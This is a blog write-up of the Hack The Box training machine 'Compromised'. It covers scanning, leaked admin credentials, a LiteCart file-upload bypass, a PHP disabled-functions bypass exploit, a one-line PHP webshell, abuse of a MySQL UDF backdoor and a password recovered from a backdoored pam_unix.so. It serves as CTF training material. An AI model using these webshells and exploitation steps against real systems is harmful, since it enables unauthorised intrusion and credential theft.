Hack The Box Write-Up Compromised - 10.10.10.207
Post
Cancel

# Hack The Box Write-Up Compromised - 10.10.10.207

You may not control all the events that happen to you, but you can decide not to be reduced by them..

Maya Angelou

# About Compromised

In this post, I’m writing a write-up for the machine Compromised from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills

Compromised is a ‘Hard’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 20 and submitting the root flag you points will be raised by 40.

Foothold

The port scan discovers two open ports. The first port is 22/tcp (SSH) and the second port is 80/tcp HTTP. On the enumeration of the web server, we can discover that LiteCart is being used. After a directory brute-force, we have discovered an admin panel and a /backup directory. The contents of the backup directory reveal overwhelming evidence that this machine is already compromised. In the hidden file .log2301c9430d8593ae.txt we can discover the credentials for the LiteCart admin panel. After we’ve found the LiteCart version, we can discover an Arbitrary File Upload (Authenticated) vulnerability and we have our foothold on this machine.

User

Through the founded vulnerability we’ve tried to gain a webshell and then we can discover that the Blue Team got in involved in this compromise. They have already taken action and disabled some PHP-functions. As the is an older version of PHP in use, we can bypass the disabled functions and upload a specially crafted PHP-file to get Remote Command Execution (RCE) on this machine. Through this RCE we are able to find credentials for the user account which is used by MySQL, and then we can find a backdoor in the User Defined Functions (UDF). Through this backdoor, we can write our public key to the authorized_keys of the user account mysql.

After we have a shell as the user account mysql, we can find the password of the user account sysadmin in the file trace-log.dat. With the use of the founded password, we can latterly move from the user account mysql to the user account sysadmin and we are able to read the user flag.

Root

This part was the hardest part and has taken me some hours to solve. After checking the integrity of the files, we can find the file pam_unix.so. After decompiling this program we can find an authentication function with parts of the password, after converting the HEX-value of the password we have the password of the user account. This sounds easy right now, but I was totally lost in this part. Because the password was not functioning. After reversing the password it was working and we where able to read the root flag.

# Machine Info

 Machine Name: Compromised Difficulty: Hard Points: 40 Release Date: 12 Sep 2020 IP: 10.10.10.207 Creator: D4nch3n

# Reconnaissance

## Port scan with Nmap

As always we start the box with a port scan with Nmap.

1 nmap -sC -sV -oA ./nmap/10.10.10.207 10.10.10.207 

The results.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 Starting Nmap 7.90SVN ( https://nmap.org ) at 2020-11-30 19:21 CET Nmap scan report for 10.10.10.207 Host is up (0.038s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) | http-title: Legitimate Rubber Ducks | Online Store |_Requested resource was http://10.10.10.207/shop/en/ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.85 seconds 

There are two open ports. The first discovered port is the default SSH port 22/tcp. The second port is the default HTTP port 80/tcp. The HTTP title is revealing the name of this website: Legitimate Rubber Ducks | Online Store. It seems that I’m dealing with a webshop or something. The requested source is http://10.10.10.207/shop/en/. I have added the hostname compromised.htb to my hosts’ file.

# Enumeration

## Enumerating Web Service

Let’s start with the enumeration of the website. I visited the URL http://10.10.10.207. It is immediately noticeable that the e-commerce platform LiteCart is being used. On the contact-section the email address [email protected] is visible.

On the page http://10.10.10.207/shop/en/create_account, I’m able to register a new account. Of course, I want a new account, so let’s register a new account! After searching some around, I see that I can order some rubber ducks. Interesting! But, I want to find a vulnerability. After a quick search on the internet, I found this recent vulnerability https://nvd.nist.gov/vuln/detail/CVE-2020-9018. I tried to use this vulnerability, but no luck. Maybe I need more information to get this working. As the name of this box is ‘Compromised’, maybe someone has already compromised this machine and had uploaded a webshell.

Let’s brute-forcing the directories. I used my favorite brute-forcer wfuzz for this one.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ~$wfuzz -c -w ../../wordlists/wfuzz/general/common.txt --hc=401,402,403,404 http://10.10.10.207/FUZZ Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 2.4.6 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.207/FUZZ Total requests: 949 =================================================================== ID Response Lines Word Chars Payload =================================================================== 000000088: 301 9 L 28 W 313 Ch "backup" 000000749: 301 9 L 28 W 311 Ch "shop" Total time: 4.565328 Processed Requests: 949 Filtered Requests: 947 Requests/sec.: 207.8711  It’s discovering the directory http://10.10.10.207/backup. This directory contains an archive, named a.tar.gz. Let’s downloading and analyzing this file. After downloading I extracted this archive. 1 tar -xvf a.tar.gz  After extracting this archive, I got the directory with the name shop. It seems that this file is containing a copy of the website. From the index.php, I got the version of LiteCart, version 2.1.2. The vulnerability I found Is applicable from version 2.2.1, maybe that’s the reason why this vulnerability is not working. After checking the internet, there is a vulnerability for this version of LiteCart, an Arbitrary File Upload (Authenticated). But to use this vulnerability, I need access to the admin portal. 1 2 3 4 5 6 7 8 ~$ cat index.php <?php /*! * LiteCart® 2.1.2 * * Online Catalog and Shopping Cart Platform * ... 

In the errors.log file, I’ve found the admin portal. The interesting part here is that there is a client visible, with the name kali-pentest.fios-router.home. My assumption, that this machine is already compromised seems to be becoming truth.

1 2 3 4 5 ~$cat errors.log [28-May-2020 01:48:07 America/New_York] Notice: Undefined index: password in ~/admin/login.php on line 28 Request: GET /shop/admin/login.php HTTP/1.1 Client: 192.168.1.209 (kali-pentest.fios-router.home) User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0  First, let’s check if the admin portal is really there, I checked the URL http://10.10.10.207/shop/admin/login.php, and this page is existing. In the root of this directory, there is a PHP-file, with the name .sh.php. So, this file is hidden. Why is this file is hidden? Let’s check the contents… Hm, a webshell. This machine is already compromised! It uses the system() function to execute commands that are being passed through cmd HTTP-request REQUEST parameter. 1 cat .sh.php  1 <?php system($_REQUEST['cmd']); ?> 

This file is there, and it seems I can access it, but cannot get any command working. So, I think this is a rabbit hole. After checking the file /shop/admin/index.php, I see that the credentials get dropped in a file, named .log2301c9430d8593ae.txt. It’s a hidden file.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 if (isset($_POST['login'])) { //file_put_contents("./.log2301c9430d8593ae.txt", "User: " .$_POST['username'] . " Passwd: " . $_POST['password']); user::login($_POST['username'], $_POST['password'],$redirect_url, isset($_POST['remember_me']) ?$_POST['remember_me'] : false); } if (empty($_POST['username']) && !empty($_SERVER['PHP_AUTH_USER'])) $_POST['username'] = !empty($_SERVER['PHP_AUTH_USER']) ? $_SERVER['PHP_AUTH_USER'] : '';$page_login = new view(); $page_login->snippets = array( 'action' =>$redirect_url, ); echo $page_login->stitch('pages/login'); require_once vmod::check(FS_DIR_HTTP_ROOT . WS_DIR_INCLUDES . 'app_footer.inc.php');  # Intrusion ## Admin access LiteCart Maybe, I can access this file through a GET request. Let’s spin up Burp. This file is located in the /admin directory. So, I configured my HTTP GET request as http://10.10.10.207/shop/admin/.log2301c9430d8593ae.txt. Yes! Got credentials. admin:theNextGenSt0r3!~ Now, I have the admin credentials of the web portal, I can try to use the known vulnerability. # Exploitation ## Arbitrary File Upload (Authenticated) The next step is to use the vulnerability to get a webshell or reverse shell on this machine. I downloaded my favorite webshell to my machine. I want to upload this webshell to the box. So, the first step is to log in as the admin user account. Let’s go to the vulnerable page and upload the webshell. I tried to upload but received the message: You must provide a valid vQmod file. So, there is a file extension restriction in place. Ok, so I need to bypass it. Let’s do it again and capture the upload with Burp. I’ve captured the upload with Burp and changed the content-type from text/php into application/xml. The upload was successful! Well, the upload was successful, but nothing is working. After trying some other web shells, I came to the conclusion that there is something wrong with the PHP on this server. I created a simple PHP script to check the phpinfo() on this machine and uploaded this PHP-file to the box. Contents of the file: 1 2 3 ?php phpinfo() ?>  I uploaded this file and I found that most of the PHP functions are disabled. Also, this page is revealing the PHP version. This website is using PHP Version 7.2.24. This is an older version of PHP, I need to find a way to bypass the disabled PHP functions. After searching on the internet, I used this script to bypass the disabled PHP functions: https://raw.githubusercontent.com/mm0r1/exploits/master/php7-gc-bypass/exploit.php. I changed the command to the command below, to get some information out of this machine. 1 pwn("id; pwd; ls");  Cool! This script is working. In the second upload, I’ve requested the content of the /etc/passwd file. Because I want to know which users got bash permission to this machine. And, the user account mysql got the permission. Why should a mysql user account has permissions to use a bash shell?! For me, there has to be a reason. It means that there is a MySQL database on this machine. I need to find a way to get into this database to read the contents. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin ync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin sysadmin:x:1000:1000:compromise:/home/sysadmin:/bin/bash mysql:x:111:113:MySQL Server,,,:/var/lib/mysql:/bin/bash red:x:1001:1001::/home/red:/bin/false  Again, this box is named compromised and the MySQL user account has access to use bash. Through this exploit, I can do some more enumeration on this machine. To make my work easier, I have changed my payload to pwn($_REQUEST['cmd']); so, that I can do command execution.

After some time of searching, I found the credentials for the MySQL database, with this command: http://10.10.10.207/shop/vqmod/xml/bp.php?cmd=cat%20../../includes/config.inc.php. The password was not directly visible, but when I’ve looked at the source code of this file, lot more information can be discovered.

I have got now the credentials:

root:changethis

## Backdoor in MySQL

I know that this machine is a compromised machine and that the blue guys intervened to prevent further damage. After spending some time on the Internet, to find information on how a backdoor can be placed in a compromised MySQL-database. I came across this article about a MySQL backdoor: https://pure.security/simple-mysql-backdoor-using-user-defined-functions/.

Let’s find out if there are User Defined Functions (UDF). I used this command below.

1 mysql -u root -p changethis -e "SELECT * FROM mysql.func;" 

After accessing the file, I can see that there is a backdoor installed in the User Defined Functions (UDF) of this machine.

1 http://10.10.10.207/shop/vqmod/xml/bp.php?cmd=mysql -u root -pchangethis -e "SELECT * FROM mysql.func;" 

Ok, now things become more interesting. There is a User Defined Function available with the name exec_cmd. The Blue Team are overlooked this UDF? However, we can use this mistake to our advantage.

We can now execute commands on the behalf of the user account mysql. As this account has the permissions for a shell, we can add my private key to this user’s account so that we can create an SSH shell for this machine.

## Shell as mysql

Let’s generate a new key-pair with ssh-keygen. We can use any key type. For this scenario, we are using ed25519. This key type has a relatively short key length, making it more comfortable to work with.

# Privilege Escalation

## Enumeration

For some reason, we are able to download linpeas.sh from my machine to the sysadmin profile nor the /tmp directory. We need to find a different way to gain root privileges. As we already know, this box is already compromised. I have already done some checks. Checking for specific running processes with ps aux and checked the files in /var/www/html directory. After searhcing around, I talked with a buddy and he advised me to check the integrity of the files. After some searching I found this command: dpkg -V. got this left:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 Compromised:/$dpkg -V dpkg: warning: linux-modules-4.15.0-99-generic: unable to open /boot/System.map-4.15.0-99-generic for hash: Permission denied ??5?????? &nbsp; /boot/System.map-4.15.0-99-generic ??5?????? c /etc/apache2/apache2.conf ??5?????? c /etc/apache2/sites-available/000-default.conf dpkg: warning: linux-image-4.15.0-101-generic: unable to open /boot/vmlinuz-4.15.0-101-generic for hash: Permission denied ??5?????? &nbsp; /boot/vmlinuz-4.15.0-101-generic dpkg: warning: sudo: unable to open /etc/sudoers for hash: Permission denied ??5?????? c /etc/sudoers dpkg: warning: sudo: unable to open /etc/sudoers.d/README for hash: Permission denied ??5?????? c /etc/sudoers.d/README dpkg: warning: at: unable to open /etc/at.deny for hash: Permission denied ??5?????? c /etc/at.deny dpkg: warning: open-iscsi: unable to open /etc/iscsi/iscsid.conf for hash: Permission denied ??5?????? c /etc/iscsi/iscsid.conf dpkg: warning: linux-image-4.15.0-99-generic: unable to open /boot/vmlinuz-4.15.0-99-generic for hash: Permission denied ??5?????? &nbsp; /boot/vmlinuz-4.15.0-99-generic ??5?????? &nbsp; /bin/nc.openbsd dpkg: warning: linux-modules-4.15.0-101-generic: unable to open /boot/System.map-4.15.0-101-generic for hash: Permission denied ??5?????? &nbsp; /boot/System.map-4.15.0-101-generic dpkg: warning: systemd: unable to open /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla for hash: Permission denied ??5?????? &nbsp; /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla ??5?????? &nbsp; /lib/x86_64-linux-gnu/security/pam_unix.so ??5?????? c /etc/apparmor.d/usr.sbin.mysqld ??5?????? c /etc/mysql/mysql.conf.d/mysqld.cnf [1]+&nbsp; Done&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; dpkg -V [email protected]:/$&nbsp; 

After some reading and trying, we got left with this file /lib/x86_64-linux-gnu/security/pam_unix.so. According to the file extension, it’s a Shared Library Function, I’m not sure what it means but the contents can be dumped with objdump. After a long time of reading and analyzing, I came across an authentication function.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 [email protected]:/lib$objdump -D /lib/x86_64-linux-gnu/security/pam_unix.so | less ... p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 14.0px Monaco; color: #f2f2f2; background-color: #000000; background-color: rgba(0, 0, 0, 0.85)} span.s1 {font-variant-ligatures: no-common-ligatures} &nbsp;3156: &nbsp; &nbsp; &nbsp; 48 89 ef&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov&nbsp; &nbsp; %rbp,%rdi &nbsp; &nbsp; 3159: &nbsp; &nbsp; &nbsp; e8 e2 24 00 00&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; callq&nbsp; 5640 <_unix_blankpasswd> &nbsp; &nbsp; 315e: &nbsp; &nbsp; &nbsp; 85 c0 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; test &nbsp; %eax,%eax &nbsp; &nbsp; 3160: &nbsp; &nbsp; &nbsp; 0f 84 1a ff ff ff &nbsp; &nbsp; &nbsp; je &nbsp; &nbsp; 3080 <pam_sm_authenticate+0x110> &nbsp; &nbsp; 3166: &nbsp; &nbsp; &nbsp; 45 85 f6&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; test &nbsp; %r14d,%r14d &nbsp; &nbsp; 3169: &nbsp; &nbsp; &nbsp; 48 c7 44 24 08 00 00&nbsp; &nbsp; movq &nbsp;$0x0,0x8(%rsp) &nbsp; &nbsp; 3170: &nbsp; &nbsp; &nbsp; 00 00&nbsp; &nbsp; &nbsp; 3172: &nbsp; &nbsp; &nbsp; 0f 84 d4 fe ff ff &nbsp; &nbsp; &nbsp; je &nbsp; &nbsp; 304c <pam_sm_authenticate+0xdc> &nbsp; &nbsp; 3178: &nbsp; &nbsp; &nbsp; 4d 85 ed&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; test &nbsp; %r13,%r13 &nbsp; &nbsp; 317b: &nbsp; &nbsp; &nbsp; 0f 84 d8 fe ff ff &nbsp; &nbsp; &nbsp; je &nbsp; &nbsp; 3059 <pam_sm_authenticate+0xe9> &nbsp; &nbsp; 3181: &nbsp; &nbsp; &nbsp; 41 c7 45 00 00 00 00&nbsp; &nbsp; movl &nbsp; $0x0,0x0(%r13) &nbsp; &nbsp; 3188: &nbsp; &nbsp; &nbsp; 00&nbsp; &nbsp; &nbsp; 3189: &nbsp; &nbsp; &nbsp; e9 89 fe ff ff&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jmpq &nbsp; 3017 <pam_sm_authenticate+0xa7> &nbsp; &nbsp; 318e: &nbsp; &nbsp; &nbsp; 66 90 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xchg &nbsp; %ax,%ax &nbsp; &nbsp; 3190: &nbsp; &nbsp; &nbsp; 4c 8b 7c 24 10&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov&nbsp; &nbsp; 0x10(%rsp),%r15 &nbsp; &nbsp; 3195: &nbsp; &nbsp; &nbsp; 48 b8 7a 6c 6b 65 7e&nbsp; &nbsp; movabs$0x4533557e656b6c7a,%rax &nbsp; &nbsp; 319c: &nbsp; &nbsp; &nbsp; 55 33 45&nbsp; &nbsp; &nbsp; 319f: &nbsp; &nbsp; &nbsp; 48 8d 74 24 19&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; lea&nbsp; &nbsp; 0x19(%rsp),%rsi &nbsp; &nbsp; 31a4: &nbsp; &nbsp; &nbsp; 48 89 44 24 19&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov&nbsp; &nbsp; %rax,0x19(%rsp) &nbsp; &nbsp; 31a9: &nbsp; &nbsp; &nbsp; 48 b8 6e 76 38 32 6d&nbsp; &nbsp; movabs $0x2d326d3238766e,%rax &nbsp; &nbsp; 31b0: &nbsp; &nbsp; &nbsp; 32 2d 00&nbsp; &nbsp; &nbsp; 31b3: &nbsp; &nbsp; &nbsp; 48 89 44 24 21&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov&nbsp; &nbsp; %rax,0x21 ...  I decided to give every HEX around this function to CyberChef. This part has taken me a very long time, but eventually I managed to find the password by giving this HEX value to CyberChef: 2d326d3238766e4533557e656b6c7a. The result was the password in reverse: -2m28vnE3U~eklz. After reversing this password with CyberChef, we have this password: zlke~U3Env82m2-. Why the need for reversing the password? This part was new for me. Now switching to the user root and take the root flag. 1 2 3 4 5 [email protected]:/lib$ su - root Password:&nbsp; [email protected]:~# cat root.txt 7bb9f47534cfb5ac2f8f0b539c85d1f4 [email protected]:~# 

Thanks for reading this write-up! I really enjoyed this machine. I hope you have enjoyed reading my write-up. If so, please consider spending a respect point. My Hack The Box Profile: https://app.hackthebox.eu/profile/224856.

Happy Hacker face!

This post is licensed under CC BY 4.0 by the author.
Trending Tags
Contents
Trending Tags